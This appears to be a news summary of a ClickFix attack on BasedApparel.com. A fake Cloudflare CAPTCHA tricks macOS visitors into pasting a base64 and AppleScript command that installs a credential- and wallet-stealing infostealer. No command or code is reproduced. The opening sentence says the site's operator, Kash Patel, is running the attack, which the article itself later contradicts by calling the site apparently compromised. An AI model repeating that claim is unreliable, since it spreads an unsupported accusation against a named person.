BasedApparel.com, operated by FBI director Kash Patel, is exploiting macOS users via a sophisticated ClickFix attack. The site mimics Cloudflare's CAPTCHA verification to trick visitors into pasting a malicious command into Terminal. This command downloads a Trojan infostealer that steals browser credentials and crypto wallet data. A user in Portugal discovered the scheme after encountering it via an Atlantic article linking to Patel's brand. The attack leverages obfuscated scripts and base64 encoding to evade detection, with VirusTotal flagging the payload as malicious across 27 antivirus engines.

The attack reflects a broader trend of hackers compromising legitimate domains to deploy malware. BasedApparel.com, co-founded by Patel with Andrew Ollis before his FBI role, appears compromised rather than directly operated by him. Security researchers note ClickFix variants persist by stealing credentials from admin panels or vulnerable plugins. Apple's macOS Tahoe 26.4 now warns against Terminal pastes, a direct response to such threats. The scheme's reliance on social engineering—preying on users' trust in CAPTCHA systems—highlights vulnerabilities in user education. Debbie, who flagged the attack, described the script as 'interesting' due to its Applescript use, though its malicious intent was clear once decoded.

This incident underscores the risks of third-party domains handling sensitive user interactions. While Patel's involvement remains unconfirmed, the attack ties to his brand's infrastructure. Users should avoid executing unfamiliar Terminal commands, especially after CAPTCHA prompts. The technical sophistication of the payload—combining base64 encoding with Applescript—demonstrates evolving attacker tactics. As ClickFix schemes remain prevalent, this case reinforces the need for vigilance against phishing and social engineering. Security tools like VirusTotal remain critical for identifying such threats before execution.